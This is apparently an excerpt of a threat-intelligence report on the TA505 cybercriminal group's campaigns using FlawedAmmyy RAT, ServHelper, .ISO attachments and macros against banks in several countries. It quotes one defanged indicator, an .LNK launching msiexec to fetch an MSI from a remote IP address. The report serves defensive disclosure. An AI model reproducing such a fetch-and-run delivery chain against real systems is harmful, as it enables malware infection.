By Hara Hiroaki, Jaromir Horejsi, and Loseway Lu (Threats Analysts)
TA505 continues to show that as a cybercriminal group, they intend to wreak as much havoc while maximizing potential profits. Given the group’s active campaigns since our updates in June and July, we continued following their latest campaigns. Just like in previous operations, they continue to make small changes, such as targeting other countries, entities, or the combination of techniques used for deployment, for each campaign.
Despite the changes, TA505 continues to use either FlawedAmmyy RAT (remote access trojan) or ServHelper as payloads. However, over the last nine campaigns since our June report, they also started using .ISO image attachments as the point of entry, as well as a .NET downloader, a new style for macro delivery, a newer version of ServHelper, and a .DLL variant of FlawedAmmyy downloader. The group also started targeting new countries, such as Turkey, Serbia, Romania, Korea, Canada, the Czech Republic, and Hungary.
.ISO, enabled macros for entry dropping ServHelper or FlawedAmmyy
We noticed that the group became active again in the middle of July, targeting Turkish and Serbian banks with emails that had .ISO file attachments as a means of entry. While the method is not new, the change in file type may yield successful infections given the unusual malware delivery technique.
Emails with an attached .ISO image is an .LNK file that uses command line msiexec to execute an MSI file from a URL such as hxxp://139[.]180[.]195[.]36/pm2.
..
Support the originator by clicking the read the rest link below.
